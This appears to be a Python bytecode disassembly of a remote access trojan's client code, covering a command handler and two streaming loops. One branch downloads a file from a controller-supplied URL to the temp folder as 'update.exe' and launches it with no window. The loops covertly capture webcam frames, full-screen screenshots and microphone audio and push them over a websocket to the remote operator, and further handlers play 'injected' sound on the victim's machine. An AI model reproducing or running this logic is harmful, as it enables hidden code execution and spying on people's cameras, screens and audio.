                 LOAD_GLOBAL            172 (CMD_DL_EXE)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      131 (to L134)

 711             LOAD_CONST               3 (0)
                 LOAD_CONST               0 (None)
                 IMPORT_NAME             87 (urllib.request)
                 STORE_FAST              26 (urllib)

 712             LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR               13 (join + NULL|self)
                 LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               14 (environ)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST               5 ('TEMP')
                 LOAD_CONST               6 ('.')
                 CALL                     2
                 LOAD_CONST              74 ('update.exe')
                 CALL                     2
                 STORE_FAST              27 (dl)

 713             LOAD_FAST               26 (urllib)
                 LOAD_ATTR              176 (request)
                 LOAD_ATTR              179 (urlretrieve + NULL|self)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              73 ('url')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 LOAD_FAST               27 (dl)
                 CALL                     2
                 POP_TOP

 714             LOAD_GLOBAL             58 (subprocess)
                 LOAD_ATTR               60 (Popen)
                 PUSH_NULL
                 LOAD_FAST               27 (dl)
                 LOAD_CONST              24 (134217728)
                 LOAD_CONST              75 (('creationflags',))
                 CALL_KW                  2
                 POP_TOP

 588   L134:     EXTENDED_ARG            10
                 JUMP_BACKWARD         2627 (to L3)

 589   L135:     CLEANUP_THROW
       L136:     EXTENDED_ARG            10
                 JUMP_BACKWARD_NO_INTERRUPT 2608 (to L7)

 595   L137:     PUSH_EXC_INFO
                 WITH_EXCEPT_START
                 TO_BOOL
                 POP_JUMP_IF_TRUE         1 (to L138)
                 RERAISE                  2
       L138:     POP_TOP
       L139:     POP_EXCEPT
                 POP_TOP
                 POP_TOP
                 EXTENDED_ARG             9
                 JUMP_BACKWARD_NO_INTERRUPT 2437 (to L12)

  --   L140:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1
       L141:     PUSH_EXC_INFO

 600             LOAD_GLOBAL             36 (Exception)
                 CHECK_EXC_MATCH
                 POP_JUMP_IF_FALSE       18 (to L144)
                 POP_TOP

 601             LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              10 ('Admin audio chunk saved to ')
                 LOAD_FAST                2 (tmp)
                 FORMAT_SIMPLE
                 BUILD_STRING             2
                 CALL                     1
                 POP_TOP
       L142:     POP_EXCEPT
       L143:     EXTENDED_ARG             9
                 JUMP_BACKWARD_NO_INTERRUPT 2422 (to L14)

 600   L144:     RERAISE                  0

  --   L145:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1
       L146:     PUSH_EXC_INFO

 602             LOAD_GLOBAL             36 (Exception)
                 CHECK_EXC_MATCH
                 POP_JUMP_IF_FALSE       25 (to L150)
                 STORE_FAST               5 (ex)

 603   L147:     LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              11 ('Admin audio playback failed: ')
                 LOAD_FAST                5 (ex)
                 FORMAT_SIMPLE
                 BUILD_STRING             2
                 CALL                     1
                 POP_TOP
       L148:     POP_EXCEPT
                 LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
                 EXTENDED_ARG             9
                 JUMP_BACKWARD_NO_INTERRUPT 2456 (to L14)

  --   L149:     LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
                 RERAISE                  1

 602   L150:     RERAISE                  0

  --   L151:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1

 622   L152:     CLEANUP_THROW
       L153:     EXTENDED_ARG             8
                 JUMP_BACKWARD_NO_INTERRUPT 2104 (to L27)

 625   L154:     CLEANUP_THROW
       L155:     EXTENDED_ARG             8
                 JUMP_BACKWARD_NO_INTERRUPT 2076 (to L33)
       L156:     CLEANUP_THROW
       L157:     EXTENDED_ARG             7
                 JUMP_BACKWARD_NO_INTERRUPT 2029 (to L40)
       L158:     PUSH_EXC_INFO
                 WITH_EXCEPT_START
                 GET_AWAITABLE            2
                 LOAD_CONST               0 (None)
       L159:     SEND                     4 (to L163)
       L160:     YIELD_VALUE              1
       L161:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L159)
       L162:     CLEANUP_THROW
       L163:     END_SEND
                 TO_BOOL
                 POP_JUMP_IF_TRUE         1 (to L164)
                 RERAISE                  2
       L164:     POP_TOP
       L165:     POP_EXCEPT
                 POP_TOP
                 POP_TOP
                 EXTENDED_ARG             8
                 JUMP_BACKWARD_NO_INTERRUPT 2051 (to L41)

  --   L166:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1

 636   L167:     CLEANUP_THROW
       L168:     EXTENDED_ARG             7
                 JUMP_BACKWARD_NO_INTERRUPT 1953 (to L47)

 657   L169:     CLEANUP_THROW
       L170:     EXTENDED_ARG             6
                 JUMP_BACKWARD_NO_INTERRUPT 1576 (to L61)

  --   L171:     PUSH_EXC_INFO

 662             POP_TOP

 663   L172:     POP_EXCEPT
                 EXTENDED_ARG             6
                 JUMP_BACKWARD         1556 (to L64)

  --   L173:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1

 664   L174:     CLEANUP_THROW
       L175:     EXTENDED_ARG             5
                 JUMP_BACKWARD_NO_INTERRUPT 1380 (to L74)

 672   L176:     PUSH_EXC_INFO
                 WITH_EXCEPT_START
                 TO_BOOL
                 POP_JUMP_IF_TRUE         1 (to L177)
                 RERAISE                  2
       L177:     POP_TOP
       L178:     POP_EXCEPT
                 POP_TOP
                 POP_TOP
                 EXTENDED_ARG             4
                 JUMP_BACKWARD_NO_INTERRUPT 1180 (to L81)

  --   L179:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1
       L180:     PUSH_EXC_INFO

 677             LOAD_GLOBAL             36 (Exception)
                 CHECK_EXC_MATCH
                 POP_JUMP_IF_FALSE       18 (to L183)
                 POP_TOP

 678             LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              55 ('Injected sound saved to ')
                 LOAD_FAST                2 (tmp)
                 FORMAT_SIMPLE
                 LOAD_CONST              56 (', but winsound playback failed.')
                 BUILD_STRING             3
                 CALL                     1
                 POP_TOP
       L181:     POP_EXCEPT
       L182:     JUMP_BACKWARD_NO_INTERRUPT 192 (to L134)

 677   L183:     RERAISE                  0

  --   L184:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1
       L185:     PUSH_EXC_INFO

 679             LOAD_GLOBAL             36 (Exception)
                 CHECK_EXC_MATCH
                 POP_JUMP_IF_FALSE       24 (to L190)
                 STORE_FAST               5 (ex)

 680   L186:     LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              57 ('Audio injection failed: ')
                 LOAD_FAST                5 (ex)
                 FORMAT_SIMPLE
                 BUILD_STRING             2
                 CALL                     1
                 POP_TOP
       L187:     POP_EXCEPT
                 LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
       L188:     JUMP_BACKWARD_NO_INTERRUPT 225 (to L134)

  --   L189:     LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
                 RERAISE                  1

 679   L190:     RERAISE                  0

  --   L191:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1

 686   L192:     CLEANUP_THROW
       L193:     EXTENDED_ARG             3
                 JUMP_BACKWARD_NO_INTERRUPT 984 (to L92)

 685   L194:     PUSH_EXC_INFO
                 WITH_EXCEPT_START
                 TO_BOOL
                 POP_JUMP_IF_TRUE         1 (to L195)
                 RERAISE                  2
       L195:     POP_TOP
       L196:     POP_EXCEPT
                 POP_TOP
                 POP_TOP
       L197:     JUMP_BACKWARD_NO_INTERRUPT 250 (to L134)

  --   L198:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1

 694   L199:     CLEANUP_THROW
       L200:     EXTENDED_ARG             3
                 JUMP_BACKWARD_NO_INTERRUPT 884 (to L103)

 697   L201:     CLEANUP_THROW
       L202:     EXTENDED_ARG             3
                 JUMP_BACKWARD_NO_INTERRUPT 813 (to L109)

 699   L203:     CLEANUP_THROW
       L204:     EXTENDED_ARG             2
                 JUMP_BACKWARD_NO_INTERRUPT 744 (to L115)

 704   L205:     CLEANUP_THROW
       L206:     EXTENDED_ARG             2
                 JUMP_BACKWARD_NO_INTERRUPT 568 (to L123)

 707   L207:     CLEANUP_THROW
       L208:     EXTENDED_ARG             1
                 JUMP_BACKWARD_NO_INTERRUPT 461 (to L129)

  --   L209:     PUSH_EXC_INFO

 715             LOAD_GLOBAL             36 (Exception)
                 CHECK_EXC_MATCH
                 POP_JUMP_IF_FALSE       46 (to L215)
                 STORE_FAST               5 (ex)

 716   L210:     LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              76 ('CMD ')
                 LOAD_FAST                7 (cmd)
                 TO_BOOL
                 POP_JUMP_IF_FALSE       11 (to L211)
                 LOAD_GLOBAL             23 (hex + NULL)
                 LOAD_FAST                7 (cmd)
                 CALL                     1
                 JUMP_FORWARD             1 (to L212)
       L211:     LOAD_CONST              77 ('?')
       L212:     FORMAT_SIMPLE
                 LOAD_CONST              78 (' err: ')
                 LOAD_FAST                5 (ex)
                 FORMAT_SIMPLE
                 BUILD_STRING             4
                 CALL                     1
                 POP_TOP
       L213:     POP_EXCEPT
                 LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
                 EXTENDED_ARG             1
                 JUMP_BACKWARD_NO_INTERRUPT 319 (to L134)

  --   L214:     LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
                 RERAISE                  1

 715   L215:     RERAISE                  0

  --   L216:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1
       L217:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)
                 RERAISE                  1
ExceptionTable:
  L1 to L5 -> L217 [0] lasti
  L5 to L6 -> L135 [2]
  L6 to L8 -> L217 [0] lasti
  L9 to L10 -> L146 [0]
  L10 to L11 -> L137 [1] lasti
  L11 to L12 -> L146 [0]
  L13 to L14 -> L141 [0]
  L14 to L16 -> L217 [0] lasti
  L17 to L18 -> L209 [0]
  L18 to L19 -> L217 [0] lasti
  L19 to L20 -> L209 [0]
  L20 to L21 -> L217 [0] lasti
  L21 to L22 -> L209 [0]
  L22 to L23 -> L217 [0] lasti
  L23 to L25 -> L209 [0]
  L25 to L26 -> L152 [2]
  L26 to L28 -> L209 [0]
  L28 to L29 -> L217 [0] lasti
  L29 to L31 -> L209 [0]
  L31 to L32 -> L154 [3]
  L32 to L34 -> L209 [0]
  L34 to L36 -> L158 [1] lasti
  L36 to L38 -> L209 [0]
  L38 to L39 -> L156 [2]
  L39 to L42 -> L209 [0]
  L42 to L43 -> L217 [0] lasti
  L43 to L45 -> L209 [0]
  L45 to L46 -> L167 [2]
  L46 to L48 -> L209 [0]
  L48 to L49 -> L217 [0] lasti
  L49 to L50 -> L209 [0]
  L50 to L51 -> L217 [0] lasti
  L51 to L52 -> L209 [0]
  L52 to L53 -> L217 [0] lasti
  L53 to L55 -> L209 [0]
  L56 to L59 -> L209 [0]
  L59 to L60 -> L169 [2]
  L60 to L62 -> L209 [0]
  L62 to L63 -> L217 [0] lasti
  L63 to L65 -> L209 [0]
  L66 to L69 -> L171 [1]
  L69 to L72 -> L209 [0]
  L72 to L73 -> L174 [2]
  L73 to L75 -> L209 [0]
  L75 to L76 -> L217 [0] lasti
  L76 to L77 -> L209 [0]
  L78 to L79 -> L185 [0]
  L79 to L80 -> L176 [1] lasti
  L80 to L81 -> L185 [0]
  L82 to L83 -> L180 [0]
  L83 to L85 -> L217 [0] lasti
  L85 to L86 -> L209 [0]
  L86 to L87 -> L217 [0] lasti
  L87 to L88 -> L209 [0]
  L88 to L90 -> L194 [1] lasti
  L90 to L91 -> L192 [3]
  L91 to L93 -> L194 [1] lasti
  L93 to L94 -> L209 [0]
  L94 to L95 -> L217 [0] lasti
  L95 to L96 -> L209 [0]
  L96 to L97 -> L217 [0] lasti
  L97 to L98 -> L209 [0]
  L98 to L99 -> L217 [0] lasti
  L99 to L101 -> L209 [0]
  L101 to L102 -> L199 [2]
  L102 to L104 -> L209 [0]
  L104 to L105 -> L217 [0] lasti
  L105 to L107 -> L209 [0]
  L107 to L108 -> L201 [2]
  L108 to L110 -> L209 [0]
  L110 to L111 -> L217 [0] lasti
  L111 to L113 -> L209 [0]
  L113 to L114 -> L203 [2]
  L114 to L116 -> L209 [0]
  L116 to L117 -> L217 [0] lasti
  L117 to L118 -> L209 [0]
  L118 to L119 -> L217 [0] lasti
  L119 to L121 -> L209 [0]
  L121 to L122 -> L205 [2]
  L122 to L124 -> L209 [0]
  L124 to L125 -> L217 [0] lasti
  L125 to L127 -> L209 [0]
  L127 to L128 -> L207 [2]
  L128 to L130 -> L209 [0]
  L130 to L131 -> L217 [0] lasti
  L131 to L132 -> L209 [0]
  L132 to L133 -> L217 [0] lasti
  L133 to L134 -> L209 [0]
  L134 to L136 -> L217 [0] lasti
  L137 to L139 -> L140 [3] lasti
  L139 to L141 -> L146 [0]
  L141 to L142 -> L145 [1] lasti
  L142 to L143 -> L146 [0]
  L143 to L144 -> L217 [0] lasti
  L144 to L145 -> L145 [1] lasti
  L145 to L146 -> L146 [0]
  L146 to L147 -> L151 [1] lasti
  L147 to L148 -> L149 [1] lasti
  L148 to L149 -> L217 [0] lasti
  L149 to L151 -> L151 [1] lasti
  L151 to L152 -> L217 [0] lasti
  L152 to L153 -> L209 [0]
  L154 to L155 -> L209 [0]
  L156 to L157 -> L209 [0]
  L158 to L160 -> L166 [3] lasti
  L160 to L161 -> L162 [6]
  L161 to L165 -> L166 [3] lasti
  L165 to L168 -> L209 [0]
  L169 to L170 -> L209 [0]
  L171 to L172 -> L173 [2] lasti
  L172 to L175 -> L209 [0]
  L176 to L178 -> L179 [3] lasti
  L178 to L180 -> L185 [0]
  L180 to L181 -> L184 [1] lasti
  L181 to L182 -> L185 [0]
  L182 to L183 -> L217 [0] lasti
  L183 to L184 -> L184 [1] lasti
  L184 to L185 -> L185 [0]
  L185 to L186 -> L191 [1] lasti
  L186 to L187 -> L189 [1] lasti
  L187 to L188 -> L209 [0]
  L188 to L189 -> L217 [0] lasti
  L189 to L191 -> L191 [1] lasti
  L191 to L192 -> L209 [0]
  L192 to L193 -> L194 [1] lasti
  L194 to L196 -> L198 [3] lasti
  L196 to L197 -> L209 [0]
  L197 to L198 -> L217 [0] lasti
  L198 to L200 -> L209 [0]
  L201 to L202 -> L209 [0]
  L203 to L204 -> L209 [0]
  L205 to L206 -> L209 [0]
  L207 to L208 -> L209 [0]
  L209 to L210 -> L216 [1] lasti
  L210 to L213 -> L214 [1] lasti
  L213 to L214 -> L217 [0] lasti
  L214 to L216 -> L216 [1] lasti
  L216 to L217 -> L217 [0] lasti

  ### cam_stream_loop ###
  --            COPY_FREE_VARS           1

 718            RETURN_GENERATOR
                POP_TOP
        L1:     RESUME                   0

 719            NOP

 720    L2:     NOP

 721    L3:     LOAD_GLOBAL              0 (_cam_stream_enabled)
                TO_BOOL
                POP_JUMP_IF_FALSE      251 (to L27)

 722            LOAD_GLOBAL              2 (_camera_lock)
                BEFORE_ASYNC_WITH
                GET_AWAITABLE            1
                LOAD_CONST               0 (None)
        L4:     SEND                     3 (to L7)
        L5:     YIELD_VALUE              1
        L6:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L4)
        L7:     END_SEND
        L8:     POP_TOP

 723            LOAD_GLOBAL              5 (_open_camera + NULL)
                CALL                     0
                STORE_FAST               0 (cap)

 724            LOAD_FAST                0 (cap)
                POP_JUMP_IF_NONE        19 (to L9)

 725            LOAD_FAST                0 (cap)
                LOAD_ATTR                7 (read + NULL|self)
                CALL                     0
                UNPACK_SEQUENCE          2
                STORE_FAST_STORE_FAST   18 (ret, frame)
                JUMP_FORWARD             2 (to L10)

 727    L9:     LOAD_CONST               1 (False)
                STORE_FAST               1 (ret)

 722   L10:     LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                CALL                     2
                GET_AWAITABLE            2
                LOAD_CONST               0 (None)
       L11:     SEND                     3 (to L14)
       L12:     YIELD_VALUE              1
       L13:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L11)
       L14:     END_SEND
                POP_TOP

 728   L15:     LOAD_FAST_CHECK          1 (ret)
                TO_BOOL
                POP_JUMP_IF_FALSE       80 (to L20)

 729            LOAD_CONST               2 (0)
                LOAD_CONST               0 (None)
                IMPORT_NAME              4 (cv2)
                STORE_FAST               3 (cv2)

 730            LOAD_FAST                3 (cv2)
                LOAD_ATTR               11 (imencode + NULL|self)
                LOAD_CONST               3 ('.jpg')
                LOAD_FAST_CHECK          2 (frame)
                LOAD_FAST                3 (cv2)
                LOAD_ATTR               12 (IMWRITE_JPEG_QUALITY)
                LOAD_CONST               4 (50)
                BUILD_LIST               2
                CALL                     3
                UNPACK_SEQUENCE          2
                STORE_FAST_STORE_FAST   69 (_, jpg)

 731            LOAD_DEREF               8 (cam_ws)
                LOAD_ATTR               15 (send + NULL|self)
                LOAD_CONST               5 (b'\x01')
                LOAD_FAST                5 (jpg)
                LOAD_ATTR               17 (tobytes + NULL|self)
                CALL                     0
                BINARY_OP                0 (+)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L16:     SEND                     3 (to L19)
       L17:     YIELD_VALUE              1
       L18:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L16)
       L19:     END_SEND
                POP_TOP
                JUMP_FORWARD            21 (to L21)

 733   L20:     LOAD_GLOBAL             19 (_log + NULL)
                LOAD_CONST               6 ('Cam stream: failed to grab frame')
                CALL                     1
                POP_TOP

 734            LOAD_GLOBAL             21 (_close_camera + NULL)
                CALL                     0
                POP_TOP

 735   L21:     LOAD_GLOBAL             22 (_audio_enabled)
                TO_BOOL
                POP_JUMP_IF_FALSE       66 (to L26)
                LOAD_GLOBAL             24 (_audio_queue)
                TO_BOOL
                POP_JUMP_IF_FALSE       55 (to L26)

 736            LOAD_GLOBAL             24 (_audio_queue)
                LOAD_ATTR               27 (popleft + NULL|self)
                CALL                     0
                STORE_FAST               6 (audio_chunk)

 737            LOAD_FAST                6 (audio_chunk)
                TO_BOOL
                POP_JUMP_IF_FALSE       28 (to L26)

 738            LOAD_DEREF               8 (cam_ws)
                LOAD_ATTR               15 (send + NULL|self)
                LOAD_CONST               7 (b'\x02')
                LOAD_FAST                6 (audio_chunk)
                BINARY_OP                0 (+)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L22:     SEND                     3 (to L25)
       L23:     YIELD_VALUE              1
       L24:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L22)
       L25:     END_SEND
                POP_TOP

  --   L26:     JUMP_FORWARD            11 (to L29)

 740   L27:     LOAD_GLOBAL             21 (_close_camera + NULL)
                CALL                     0
                POP_TOP
       L28:     NOP

 743   L29:     LOAD_GLOBAL             30 (asyncio)
                LOAD_ATTR               32 (sleep)
                PUSH_NULL
                LOAD_CONST               9 (0.08)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L30:     SEND                     3 (to L33)
       L31:     YIELD_VALUE              1
       L32:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L30)
       L33:     END_SEND
                POP_TOP

 719            EXTENDED_ARG             1
                JUMP_BACKWARD          307 (to L2)

 722   L34:     CLEANUP_THROW
       L35:     EXTENDED_ARG             1
                JUMP_BACKWARD_NO_INTERRUPT 285 (to L7)
       L36:     CLEANUP_THROW
       L37:     JUMP_BACKWARD_NO_INTERRUPT 237 (to L14)
       L38:     PUSH_EXC_INFO
                WITH_EXCEPT_START
                GET_AWAITABLE            2
                LOAD_CONST               0 (None)
       L39:     SEND                     4 (to L43)
       L40:     YIELD_VALUE              1
       L41:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L39)
       L42:     CLEANUP_THROW
       L43:     END_SEND
                TO_BOOL
                POP_JUMP_IF_TRUE         1 (to L44)
                RERAISE                  2
       L44:     POP_TOP
       L45:     POP_EXCEPT
                POP_TOP
                POP_TOP
                EXTENDED_ARG             1
                JUMP_BACKWARD_NO_INTERRUPT 259 (to L15)

  --   L46:     COPY                     3
                POP_EXCEPT
                RERAISE                  1

 731   L47:     CLEANUP_THROW
       L48:     JUMP_BACKWARD_NO_INTERRUPT 180 (to L19)

 738   L49:     CLEANUP_THROW
       L50:     JUMP_BACKWARD_NO_INTERRUPT 83 (to L25)

  --   L51:     PUSH_EXC_INFO

 741            LOAD_GLOBAL             28 (Exception)
                CHECK_EXC_MATCH
                POP_JUMP_IF_FALSE       24 (to L55)
                STORE_FAST               7 (ex)

 742   L52:     LOAD_GLOBAL             19 (_log + NULL)
                LOAD_CONST               8 ('Cam stream error: ')
                LOAD_FAST                7 (ex)
                FORMAT_SIMPLE
                BUILD_STRING             2
                CALL                     1
                POP_TOP
       L53:     POP_EXCEPT
                LOAD_CONST               0 (None)
                STORE_FAST               7 (ex)
                DELETE_FAST              7 (ex)
                JUMP_BACKWARD_NO_INTERRUPT 98 (to L29)

  --   L54:     LOAD_CONST               0 (None)
                STORE_FAST               7 (ex)
                DELETE_FAST              7 (ex)
                RERAISE                  1

 741   L55:     RERAISE                  0

  --   L56:     COPY                     3
                POP_EXCEPT
                RERAISE                  1

 743   L57:     CLEANUP_THROW
       L58:     JUMP_BACKWARD_NO_INTERRUPT 80 (to L33)

  --   L59:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)
                RERAISE                  1
ExceptionTable:
  L1 to L2 -> L59 [0] lasti
  L3 to L5 -> L51 [0]
  L5 to L6 -> L34 [3]
  L6 to L8 -> L51 [0]
  L8 to L10 -> L38 [1] lasti
  L10 to L12 -> L51 [0]
  L12 to L13 -> L36 [2]
  L13 to L17 -> L51 [0]
  L17 to L18 -> L47 [2]
  L18 to L23 -> L51 [0]
  L23 to L24 -> L49 [2]
  L24 to L26 -> L51 [0]
  L26 to L27 -> L59 [0] lasti
  L27 to L28 -> L51 [0]
  L28 to L31 -> L59 [0] lasti
  L31 to L32 -> L57 [2]
  L32 to L34 -> L59 [0] lasti
  L34 to L35 -> L51 [0]
  L36 to L37 -> L51 [0]
  L38 to L40 -> L46 [3] lasti
  L40 to L41 -> L42 [6]
  L41 to L45 -> L46 [3] lasti
  L45 to L48 -> L51 [0]
  L49 to L50 -> L51 [0]
  L51 to L52 -> L56 [1] lasti
  L52 to L53 -> L54 [1] lasti
  L53 to L54 -> L59 [0] lasti
  L54 to L56 -> L56 [1] lasti
  L56 to L58 -> L59 [0] lasti

  ### stream_loop ###
  --            COPY_FREE_VARS           1

 745            RETURN_GENERATOR
                POP_TOP
        L1:     RESUME                   0

 746            LOAD_CONST               0 (None)
                STORE_FAST               0 (cam)

 747            LOAD_GLOBAL              0 (mss)
                LOAD_ATTR                0 (mss)
                PUSH_NULL
                CALL                     0
                BEFORE_WITH
        L2:     STORE_FAST               1 (s)

 748            NOP

 749    L3:     NOP

 750    L4:     LOAD_GLOBAL              2 (_view_mode)
                LOAD_CONST               2 ('cam')
                COMPARE_OP              88 (bool(==))
                POP_JUMP_IF_FALSE      220 (to L11)

 751            LOAD_FAST                0 (cam)
                POP_JUMP_IF_NOT_NONE   105 (to L5)

 752            LOAD_CONST               3 (0)
                LOAD_CONST               0 (None)
                IMPORT_NAME              2 (cv2)
                STORE_FAST               2 (cv2)

 753            LOAD_FAST                2 (cv2)
                LOAD_ATTR                7 (VideoCapture + NULL|self)
                LOAD_CONST               3 (0)
                CALL                     1
                STORE_FAST               0 (cam)

 754            LOAD_FAST                0 (cam)
                LOAD_ATTR                9 (set + NULL|self)
                LOAD_FAST                2 (cv2)
                LOAD_ATTR               10 (CAP_PROP_FRAME_WIDTH)
                LOAD_CONST               4 (1280)
                CALL                     2
                POP_TOP

 755            LOAD_FAST                0 (cam)
                LOAD_ATTR                9 (set + NULL|self)
                LOAD_FAST                2 (cv2)
                LOAD_ATTR               12 (CAP_PROP_FRAME_HEIGHT)
                LOAD_CONST               5 (720)
                CALL                     2
                POP_TOP

 756            LOAD_FAST                0 (cam)
                LOAD_ATTR                9 (set + NULL|self)
                LOAD_FAST                2 (cv2)
                LOAD_ATTR               14 (CAP_PROP_FPS)
                LOAD_CONST               6 (30)
                CALL                     2
                POP_TOP

 757    L5:     LOAD_FAST                0 (cam)
                LOAD_ATTR               17 (read + NULL|self)
                CALL                     0
                UNPACK_SEQUENCE          2
                STORE_FAST_STORE_FAST   52 (ret, frame)

 758            LOAD_FAST                3 (ret)
                TO_BOOL
                POP_JUMP_IF_FALSE       86 (to L10)

 759            LOAD_FAST_CHECK          2 (cv2)
                LOAD_ATTR               19 (imencode + NULL|self)
                LOAD_CONST               7 ('.jpg')
                LOAD_FAST_LOAD_FAST     66 (frame, cv2)
                LOAD_ATTR               20 (IMWRITE_JPEG_QUALITY)
                LOAD_CONST               8 (80)
                LOAD_FAST                2 (cv2)
                LOAD_ATTR               22 (IMWRITE_JPEG_OPTIMIZE)
                LOAD_CONST               9 (1)
                BUILD_LIST               4
                CALL                     3
                UNPACK_SEQUENCE          2
                STORE_FAST_STORE_FAST   86 (_, jpg)

 760            LOAD_DEREF              11 (ws)
                LOAD_ATTR               25 (send + NULL|self)
                LOAD_CONST              10 (b'\x01')
                LOAD_FAST                6 (jpg)
                LOAD_ATTR               27 (tobytes + NULL|self)
                CALL                     0
                BINARY_OP                0 (+)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
        L6:     SEND                     3 (to L9)
        L7:     YIELD_VALUE              1
        L8:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L6)
        L9:     END_SEND
                POP_TOP

  --   L10:     JUMP_FORWARD           165 (to L17)

 762   L11:     LOAD_FAST                0 (cam)
                POP_JUMP_IF_NONE        18 (to L12)

 763            LOAD_FAST                0 (cam)
                LOAD_ATTR               29 (release + NULL|self)
                CALL                     0
                POP_TOP

 764            LOAD_CONST               0 (None)
                STORE_FAST               0 (cam)

 765   L12:     LOAD_FAST                1 (s)
                LOAD_ATTR               31 (grab + NULL|self)
                LOAD_FAST                1 (s)
                LOAD_ATTR               32 (monitors)
                LOAD_CONST               3 (0)
                BINARY_SUBSCR
                CALL                     1
                STORE_FAST               7 (img)

 766            LOAD_GLOBAL             35 (BytesIO + NULL)
                CALL                     0
                STORE_FAST               8 (buf)

 767            LOAD_GLOBAL             36 (Image)
                LOAD_ATTR               38 (frombytes)
                PUSH_NULL
                LOAD_CONST              11 ('RGB')
                LOAD_FAST                7 (img)
                LOAD_ATTR               40 (size)
                LOAD_FAST                7 (img)
                LOAD_ATTR               42 (bgra)
                LOAD_CONST              12 ('raw')
                LOAD_CONST              13 ('BGRX')
                CALL                     5
                LOAD_ATTR               45 (save + NULL|self)
                LOAD_FAST                8 (buf)
                LOAD_CONST              14 ('JPEG')
                LOAD_CONST              15 (75)
                LOAD_CONST               1 (True)
                LOAD_CONST              16 (('format', 'quality', 'optimize'))
                CALL_KW                  4
                POP_TOP

 768            LOAD_DEREF              11 (ws)
                LOAD_ATTR               25 (send + NULL|self)
                LOAD_CONST              10 (b'\x01')
                LOAD_FAST                8 (buf)
                LOAD_ATTR               47 (getvalue + NULL|self)
                CALL                     0
                BINARY_OP                0 (+)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L13:     SEND                     3 (to L16)
       L14:     YIELD_VALUE              1
       L15:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L13)
       L16:     END_SEND
                POP_TOP

 770   L17:     LOAD_GLOBAL             48 (_audio_enabled)
                TO_BOOL
                POP_JUMP_IF_FALSE       66 (to L22)
                LOAD_GLOBAL             50 (_audio_queue)
                TO_BOOL
                POP_JUMP_IF_FALSE       55 (to L22)

 771            LOAD_GLOBAL             50 (_audio_queue)
                LOAD_ATTR               53 (popleft + NULL|self)
                CALL                     0
                STORE_FAST               9 (audio_chunk)

 772            LOAD_FAST                9 (audio_chunk)
                TO_BOOL
                POP_JUMP_IF_FALSE       28 (to L22)

 773            LOAD_DEREF              11 (ws)
                LOAD_ATTR               25 (send + NULL|self)
                LOAD_CONST              17 (b'\x02')
                LOAD_FAST                9 (audio_chunk)
                BINARY_OP                0 (+)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L18:     SEND                     3 (to L21)
       L19:     YIELD_VALUE              1
       L20:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L18)
       L21:     END_SEND
                POP_TOP

 776   L22:     LOAD_GLOBAL             58 (asyncio)
                LOAD_ATTR               60 (sleep)
                PUSH_NULL
                LOAD_CONST              19 (0.08)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L23:     SEND                     3 (to L26)
       L24:     YIELD_VALUE              1
       L25:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L23)
       L26:     END_SEND
                POP_TOP

 748            EXTENDED_ARG             1
                JUMP_BACKWARD          506 (to L3)

 760   L27:     CLEANUP_THROW
       L28:     EXTENDED_ARG             1
                JUMP_BACKWARD_NO_INTERRUPT 281 (to L9)

 768   L29:     CLEANUP_THROW
       L30:     JUMP_BACKWARD_NO_INTERRUPT 117 (to L16)

 773   L31:     CLEANUP_THROW
       L32:     JUMP_BACKWARD_NO_INTERRUPT 42 (to L21)

  --   L33:     PUSH_EXC_INFO

